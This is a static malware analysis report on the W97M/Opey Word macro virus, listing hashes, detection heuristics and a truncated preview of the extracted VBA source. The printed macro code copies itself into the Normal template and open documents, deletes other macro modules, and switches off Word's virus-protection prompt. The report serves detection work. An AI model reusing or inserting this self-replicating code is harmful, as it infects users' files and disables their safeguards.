W97M/Opey — Office (OLE) malware analysis

Static analysis result for SHA-256 d2bca65dbdcc0aaf…

MALICIOUS

Office (OLE)

70.0 KB Created: 2000-11-09 11:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b31561da340513dfe8737beeeaccb551 SHA-1: 2ad83810669bb8e729d1d7c791de7750aae3c401 SHA-256: d2bca65dbdcc0aaf9d299c439c15408551fb73ef6363d37c6fdf7fafaa8c5c7e
220 Risk Score

Malware Insights

W97M/Opey · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen macro, which are commonly used to execute malicious code. The embedded script attempts to copy itself to other documents and potentially the Normal template, indicating an effort to spread and persist. ClamAV detections further confirm its malicious nature, identifying it as Doc.Trojan.Opey-18.

Heuristics 4

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24038 bytes
SHA-256: aac2a859c8fb4262a21be119106cec565bcac60ca97fcea601e6ce467cfad1e1
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Crazy_Man_06"
Sub AkoLang()
  On Error Resume Next
  System.Cursor = wdCursorNormal
      Call Crazy_01
    NTInfected = False
        For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
            clan = NormalTemplate.VBProject.VBComponents(i).Name
                If (clan = "MyForm1") And (clan = "Crazy_Man_06") Then NTInfected = True
                If (clan <> "MyForm1") And (clan <> "Crazy_Man_06") And (clan <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
        Next i
        For Each opendoc In Documents
            ODInfected = False
            With opendoc
             For j = opendoc.VBProject.VBComponents.Count To 1 Step -1
                clan = opendoc.VBProject.VBComponents(j).Name
                    If (clan = "MyForm1") And (clan = "Crazy_Man_06") Then ODInfected = True
                    If (clan <> "MyForm1") And (clan <> "Crazy_Man_06") And (clan <> "ThisDocument") And (clan <> "Reference to Normal") Then
                    Application.OrganizerDelete Source:=opendoc.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
                     End If
                 Next j
                If ODInfected = False Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="Crazy_Man_06", Object:=wdOrganizerObjectProjectItems
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="MyForm1", Object:=wdOrganizerObjectProjectItems
                    If (Mid(opendoc.FullName, 2, 1) = ":") Then
                      filesSize = FileLen(opendoc.Name)
                       If (System.FreeDiskSpace <= filesSize) Then
                          MsgBox prompt:="Cant' Save " & opendoc.Name & " in Drive " & Mid(opendoc.FullName, 1, 1) & ":\ Disk is full, Please Insert Another Disk and Click Ok.."
                          If (System.FreeDiskSpace <= filesSize) Then
                            MsgBox prompt:="Disk Full Try to save to another drive.."
                             Dialogs(wdDialogFileSaveAs).Show
                              
                          End If
                          Else
                          opendoc.SaveAs FileName:=opendoc.FullName
                       End If
                      End If
                    
                    End If
            End With
        Next opendoc
            If NTInfected = False Then
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Crazy_Man_06", Object:=wdOrganizerObjectProjectItems
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="MyForm1", Object:=wdOrganizerObjectProjectItems
                NormalTemplate.Save
            End If
         
End Sub
Sub Crazy_01()
    On Error Resume Next
System.Cursor = wdCursorNormal
    If (Month(Now) > 7) Then
    Application.UserName = "Crazy Man"
    Application.UserAddress = "LBTMM B'99 PHILIPPINES"
    Application.UserInitials = "Crazy"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Crazy Man"
        .Title = "Crazy"
        .Manager = "MMA"
        .Company = "Crazy Man Company"
        .Comments = "HELLO I am the Crazy Man From the Crazy World of Computer. Don't you worry I'm not as crazy than you think..."
        .Execute
    End With
    End If
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    Comma
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.